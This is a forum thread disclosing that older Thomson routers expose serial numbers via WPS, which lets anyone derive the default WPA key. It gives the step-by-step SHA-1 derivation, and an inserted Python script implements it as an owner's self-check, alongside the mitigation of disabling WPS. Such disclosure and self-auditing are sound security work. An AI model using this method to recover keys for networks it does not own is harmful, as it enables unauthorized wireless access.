
Re: What can someone do after discovering a "exploit"?

So, it turns out there was already a tool capable of exploiting what I discovered; the only thing I am is the first person to notice this flaw on the maker's routers and, now, bring it to the public. The affected router brand is Thomson and, as I recently got access to the latest model of these routers (TG784n)*, I have to re-phrase my initial statement. This flaw can only be found on older models of this brand of routers.

*: I found a colleague with this kind of router, and he gave me visual access to the router (the only thing I needed to test the flaw), and the wireless key I got through the calculations differed from the default wireless key found on the sticker. So I assume that newer models (maybe from 2010/11 to the future) do not have this vulnerability.

In order to explain my findings, I have to introduce some background:
As some (or all, given that we are on a security-related forum) of you may know, back in 2008, Kevin Devine discovered a flaw in SpeedTouch and Thomson routers that would allow him to calculate the default wireless encryption key for each router. He released a tool capable of calculating and providing the user with the default password, using only the last 6 characters of the default SSID (more info @ GNUCitizen.org).

But, somewhere around 2010, Thomson fixed this vulnerability by changing the last 6 digits of the default SSID (now they match the last 6 digits of the wireless interface MAC address, instead of the last 6 digits from the sha1 hash [read link above]). Unfortunately, it was still insecure, since with Kevin's findings it was possible to generate a password list for every router made in 2010/2011 (and now 2012) that would substantially reduce the brute-force attack time against a WPA handshake (I talked about this vulnerability in these forums a while back; a quick search should reveal it). That must be why they changed the whole algorithm in newer models.

Now, with the recent discovery of WPS vulnerabilities, one of them being that the routers give too much information about themselves, such as maker, model and Serial Number ("Oh!" you say), it was easy to develop a way to use this information to get the default wireless key:

Using a tool called wpscan (not the WordPress one) developed by SourceSec, an attacker could get an output like this (values are fictional):

From this, an attacker could check if the router has this flaw (by checking the model, in blue) and, if it was vulnerable, he would grab the Serial Number and start the calculation process:

Code:

1011TSABC

Add "CP" to the beginning of the string and remove "TS" value (always the 2 characters in-between the first 4 numbers and the last 3 characters):

Code:

CP1011ABC

Convert the last 3 characters to hexadecimal (and convert lowercase to uppercase, in case it has letters):

Code:

CP1011414243

Process this last string through sha-1:

Code:

8d6bea96fc2eb7b52020c45492e379cab1940d89

Grab the first 10 digits, uppercase them, and here is the default wireless key:

Code:

8D6BEA96FC

Note: If you're going to test this, please try to isolate your AP on a specific channel, airodump that channel and run wpscan after. I'm telling you this because "WPScan actively sends 802.11 probe requests to access points that advertise WPS support", and that could be considered illegal (I'm not sure, but just to be safe...).

Cheers!

P.S.: This vulnerability can be fixed by turning off WPS, which is enabled by default. It can be done through telnet (never found the option on the web interface); this site will help with the commands needed. Obviously, even after turning off WPS, the router will not be secure if it has the default password set (due to the other vulnerabilities I mentioned earlier).
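The derivation Snayler lays out above (serial, "CP" prefix, drop the two-letter code, hex-encode the last three characters, SHA-1, first ten hex digits uppercased), written out as an added Python self-check; this is not code from the original post or from the tool it mentions. It assumes the serial layout the post describes (4 digits, 2 letters, 3 characters) and that SHA-1 is taken over the ASCII string; the hash value quoted in the post for the fictional serial is not asserted here. The intended use is defensive: compare the derived value with the key actually configured on a router you administer, and if they match, the key is still the predictable default and should be changed (and WPS disabled, as the P.S. says).

```python
import hashlib
import re

# Serial layout as described in the post: 4 digits, a 2-letter code ("TS"),
# then 3 trailing characters. This regex is an assumption based on that description.
SERIAL_RE = re.compile(r"^(\d{4})([A-Za-z]{2})([A-Za-z0-9]{3})$")


def sha1_hex(text: str) -> str:
    """SHA-1 of the ASCII encoding of text, as a lowercase hex digest."""
    return hashlib.sha1(text.encode("ascii")).hexdigest()


def preprocess_serial(serial: str) -> str:
    """Build the string that gets hashed: 'CP' + the 4 digits + hex of the uppercased last 3 characters.

    Raises ValueError if the serial does not follow the assumed layout.
    """
    match = SERIAL_RE.match(serial.strip())
    if not match:
        raise ValueError(f"serial {serial!r} does not match the 4-digit/2-letter/3-char layout")
    digits, _code, tail = match.groups()
    # Each of the last 3 characters becomes its 2-digit hex ASCII code ("ABC" -> "414243").
    tail_hex = tail.upper().encode("ascii").hex().upper()
    return "CP" + digits + tail_hex


def derive_default_key(serial: str) -> str:
    """First 10 hex digits of SHA-1 over the preprocessed string, uppercased."""
    return sha1_hex(preprocess_serial(serial))[:10].upper()


def key_is_predictable(serial: str, configured_key: str) -> bool:
    """Self-check: True if the key currently set on the AP equals the derived default key."""
    return configured_key.strip().upper() == derive_default_key(serial)


if __name__ == "__main__":
    sample_serial = "1011TSABC"  # the fictional serial used in the post (constructed sample)
    print("hash input :", preprocess_serial(sample_serial))  # CP1011414243
    print("derived key:", derive_default_key(sample_serial))
    # Replace the placeholder with the key configured on your own router to run the check.
    print("still default?", key_is_predictable(sample_serial, "<key configured on your AP>"))
```

If the check prints True for a router you own, the fix is the one the post gives: set a new passphrase and disable WPS, since the serial leaks through WPS regardless of the key in use.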

Re: What can someone do after discovering a "exploit"?

@Snayler this is very interesting. I suspect many router vendors employ similar means to derive default WPA keys. Since the key is ultimately the product of the non-reversible SHA1 hash function, I wonder, how did you derive the algorithm, specifically the part about adding CP and removing TS? Did you just play around with serial numbers until you figured it out?

Re: What can someone do after discovering a "exploit"?

Originally Posted by ternarybit

@Snayler this is very interesting. I suspect many router vendors employ similar means to derive default WPA keys. Since the key is ultimately the product of the non-reversible SHA1 hash function, I wonder, how did you derive the algorithm, specifically the part about adding CP and removing TS? Did you just play around with serial numbers until you figured it out?

No! I'm not that smart. Back in April 2008, Kevin Devine discovered that flaw (calculating the default password from the serial number) and created a PoC where you can calculate all possible default passwords based on the last 6 chars of the default SSID. Around 2009/2010, Thomson (I guess) fixed this issue by changing the last chars of the SSID to the last 6 chars of the AP's MAC address. This fixed the vulnerability found by Kevin, but I discovered that the router freely announces its serial number through WPS. So I just had to check Kevin's discovery on how to calculate the default password from the serial number and ta-da! Vulnerability found. If you want, you can read more about Kevin's findings in the link posted by hannah. If you want a more hardcore explanation, you can read it here: